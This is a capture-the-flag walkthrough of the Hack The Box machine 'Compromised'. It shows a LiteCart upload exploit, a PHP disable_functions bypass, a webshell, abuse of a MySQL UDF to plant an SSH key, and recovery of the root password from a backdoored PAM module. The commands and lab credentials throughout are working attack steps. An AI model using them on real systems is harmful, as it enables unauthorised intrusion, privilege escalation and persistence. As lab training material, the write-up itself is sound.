Compromised is a linux machine rated as difficult from Hack The Box, it consists on enumerating to find credentials for admin access, then as lots of php functions are disabled, a php bypass exploit can be used to obtain a webshell. Then, looking for backdoors mysql can be used to obtain ssh access and then obtaining sysadmin credentials. Finally a pam backdoor is found and by reversing it, root credentials are retrieved.
Enumeration
Running nmap :
1
2
3
4
5
6
7
8
9
10
11
12
nmap -sC -sV compromised.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
| 256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_ 256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://compromised.htb/shop/en/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Browsing to port 80 we find the following page :
Running gobuster to enumerate web directories we find a backup dir containing a copy of the page source :
1
2
3
4
gobuster dir -u http://compromised.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/shop (Status: 301)
/backup (Status: 301)
/server-status (Status: 403)
Enumerating the backup of the site, I decided to grep inside admin directory to see it there were any passwords :
1
2
noxious@kali:~/Desktop/Vms/HTB/Compromised/shop/admin$ grep -ir "passwd" --color=always
login.php: //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
Then this file stood out, it wasn’t inside the backup of the site but accesing it through the web revealed the admin credentials : 
Exploitation
After being logged in as admin it was discovered that the site was running LiteCart 2.1.2 for which an arbitraty file upload exploit was available :
https://www.exploit-db.com/exploits/45267
Running the exploit :
1
2
python litecart.py -t http://compromised.htb/shop/admin/ -u 'admin' -p 'theNextGenSt0r3!~'
Shell => http://compromised.htb/shop/admin/../vqmod/xml/GVYL1.php?c=id
But when I tried to use that webshell I found out that it didn’t work, so I modified the exploit code to run a phpinfo(), discovering that there were several php functions disabled.
Most of these functions are used to obtain a webshell, therefore, knowing the php version I searched for an exploit that bypassed disabled functions :
https://packetstormsecurity.com/files/154728/PHP-7.3-disable_functions-Bypass.html
Then we needed to modify the code to get a webshell :
1
pwn($_GET[‘c’]);
Next, we started burpsuite to upload the exploit in the following url : http://compromised.htb/shop/admin/?app=vqmods&doc=vqmods
Modifying content-type to xml was enough to bypass the filter and upload the file :
Finally, we can use webwrap to obtain an interactive webshell :
1
2
3
rlwrap python3 webwrap.py http://compromised.htb/shop/vqmod/xml/sh.php?c=WRAP
www-data@compromised:/var/www/html/shop/vqmod/xml$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Now we need to enumerate the machine in order to find some information that can lead us to obtain user access.
First by reading /etc/passwd I noticed that the mysql user had /bin/bash and following the machine’s name this might be a hint that this service has some kind of backdoor :
1
2
www-data@compromised:/var/www/html/shop/vqmod/xml$ cat /etc/passwd
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
Afterwards, a config file containing database credentials was discovered :
1
2
3
4
5
6
7
8
9
10
www-data@compromised:/var/www/html/shop/includes$ cat config.inc.php
// Database
define('DB_TYPE', 'mysql');
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'changethis');
define('DB_DATABASE', 'ecom');
define('DB_TABLE_PREFIX', 'lc_');
define('DB_CONNECTION_CHARSET', 'utf8');
define('DB_PERSISTENT_CONNECTIONS', 'false');
Investigating about mysql backdoor and exploits I came across this [article] (https://recipeforroot.com/mysql-to-system-root/) which pointed me where to look.
1
2
3
4
www-data@compromised:/var/www/html/shop/includes$ mysql -u root --password=changethis -e "use mysql; select * from func"
mysql: [Warning] Using a password on the command line interface can be insecure.
name ret dl type
exec_cmd 0 libmysql.so function
Then we could use this exec_cmd function to execute commands as mysql user :
1
2
3
4
mysql -u root --password=changethis -e "select exec_cmd('id')"
mysql: [Warning] Using a password on the command line interface can be insecure.
exec_cmd('id')
uid=111(mysql) gid=113(mysql) groups=113(mysql)
Next, as ssh service was open I decided to upload my public key to authorized keys
1
mysql -u root --password=changethis -e "select exec_cmd('echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFuyPr4RFVPtUVBstN9/BoYQemup/I2VkSHV2lw8ul+d noxious@kali > ~/.ssh/authorized_keys')"
We could just ssh as mysql user :
1
2
3
ssh mysql@compromised.htb
mysql@compromised:~$ id
uid=111(mysql) gid=113(mysql) groups=113(mysql)
Enumerating files , strace-log.dat caught my attention, grepping for passwords there was an interesting finding from mysql :
1
2
mysql@compromised:~$ cat strace-log.dat | grep password
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=3*NLJE32I$Fe"], 0x55bc62467900 /* 21 vars */)
Then, I tried this password to see if I was able to switch user to sysadmin, being successful
1
2
3
mysql@compromised:~$ su sysadmin
sysadmin@compromised:/var/lib/mysql$ id
uid=1000(sysadmin) gid=1000(sysadmin) groups=1000(sysadmin)
Privilege Escalation
After some time enumerating without finding any useful thing, I decided to follow the machine’s theme and try to look for backdoors , so looking for recently modified things I came across the following output
1
2
3
4
5
6
7
8
9
sysadmin@compromised:/lib$ find . -mtime -24
.
./x86_64-linux-gnu/security
./x86_64-linux-gnu/security/.pam_unix.so
./x86_64-linux-gnu/security/pam_unix.so
./systemd/system
./udev
./udev/rules.d
./ifupdown
Looking for a pam backdoor , I found one in github that created the same archive :
https://github.com/zephrax/linux-pam-backdoor
So I decided to transfer this file to my machine using scp:
1
scp sysadmin@compromised.htb:/lib/x86_64-linux-gnu/security/pam_unix.so Desktop/pam_unix.so
Once I had this file in my machine, I opened it with ghidra in order to see if I could find the password used
Decompiling the functions, there were two hex strings inside pam_sm_authenticate belonging to variable backdoor :
Switching this two strings to little endian and appending them we got the following hex string :
1
7a6c6b657e5533456e7638326d322d
Decoding it we obtain the root password :
1
2
echo "7a6c6b657e5533456e7638326d322d" | xxd -r -p
zlke~U3Env82m2-
Finally, we can just access root account :
1
2
3
4
5
6
sysadmin@compromised:/lib$ su root
Password:
root@compromised:/lib# id
uid=0(root) gid=0(root) groups=0(root)
root@compromised:/lib# whoami
root